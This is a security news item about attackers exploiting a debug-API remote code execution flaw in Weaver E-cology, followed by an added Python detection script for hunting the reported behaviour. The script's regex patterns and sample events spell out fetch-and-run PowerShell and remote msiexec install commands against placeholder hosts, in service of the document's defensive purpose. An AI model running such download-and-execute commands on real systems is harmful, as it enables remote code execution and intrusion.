Vulnerability Management, Patch/Configuration Management

Hackers exploit critical Weaver E-cology vulnerability

Per Bleeping Computer, hackers have been actively exploiting a critical vulnerability, identified as CVE-2026-22679, in the Weaver E-cology office automation platform since mid-March. This exploitation began just five days after the software vendor released a patch for the issue and two weeks before its public disclosure.

Threat intelligence company Vega documented the attacks, which targeted organizations primarily in China that use Weaver E-cology for workflows, document management, and internal business processes. The critical unauthenticated remote code execution flaw stems from an exposed debug API endpoint that allows unvalidated, user-supplied parameters to reach backend Remote Procedure Call (RPC) functionality. Attackers used this to execute system commands, initially attempting discovery commands via ping and PowerShell downloads, which were blocked. They then tried to deploy an MSI installer, which also failed. Subsequently, they reverted to using obfuscated, fileless PowerShell scripts fetched remotely, executing reconnaissance commands like whoami and ipconfig.

Despite having remote code execution capabilities, the attackers did not establish persistent sessions. Users of Weaver E-cology 10.0 are strongly advised to apply the security updates provided by the vendor, as upgrading is the only recommended mitigation.
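
The child-process activity described above (ping, an MSI install, PowerShell fetching remote content, whoami and ipconfig) can be hunted in process-creation telemetry. The following is an added example, not code from Vega, Bleeping Computer or the vendor. It assumes the application server runs as java.exe or javaw.exe, and its sample events use constructed placeholder hosts, paths and URLs.

```python
import ntpath
import re

# Assumption: the E-cology application server runs as one of these processes.
APP_SERVER_PARENTS = {"java.exe", "javaw.exe"}

# One rule per behaviour the article reports: (label, child image, command-line regex).
RULES = [
    ("discovery", r"(ping|whoami|ipconfig)\.exe", None),
    ("msi-install", r"msiexec\.exe", r"(?i)\s[/-](i|package)\b"),
    ("powershell-remote-fetch", r"(powershell|pwsh)\.exe",
     r"(?i)https?://|downloadstring|invoke-webrequest|\biwr\b|\biex\b|-e(nc\w*)?\s"),
    ("powershell-other", r"(powershell|pwsh)\.exe", None),
]


def classify(event):
    """Label a process-creation event if the app server spawned a reported child."""
    parent = ntpath.basename(event["parent_image"]).lower()
    child = ntpath.basename(event["image"]).lower()
    if parent not in APP_SERVER_PARENTS:
        return None
    for label, image_re, cmd_re in RULES:
        if re.fullmatch(image_re, child) and (
                cmd_re is None or re.search(cmd_re, event["command_line"])):
            return label
    return None


def triage(events):
    """Collect labels per host so a multi-stage sequence stands out."""
    hits = {}
    for event in events:
        label = classify(event)
        if label:
            hits.setdefault(event["host"], []).append(label)
    return hits


def ev(host, parent, image, cmd):
    return {"host": host, "parent_image": parent, "image": image, "command_line": cmd}


# Constructed sample events; hosts, paths and URLs are placeholders, not from the article.
JAVA = r"D:\app\jdk\bin\java.exe"
SAMPLE = [
    ev("oa01", JAVA, r"C:\Windows\System32\PING.EXE", "ping -n 1 probe.example.invalid"),
    ev("oa01", JAVA, r"C:\Windows\System32\msiexec.exe", "msiexec /q /i http://files.example.invalid/a.msi"),
    ev("oa01", JAVA, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "powershell -nop -c iex(iwr http://files.example.invalid/s)"),
    ev("oa01", JAVA, r"C:\Windows\System32\whoami.exe", "whoami"),
    ev("oa02", r"C:\Windows\explorer.exe", r"C:\Windows\System32\ipconfig.exe", "ipconfig /all"),
]
```

Calling triage(SAMPLE) groups the four app-server-spawned events under oa01 and ignores the ipconfig run started from explorer.exe on oa02.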

Source: Bleeping Computer
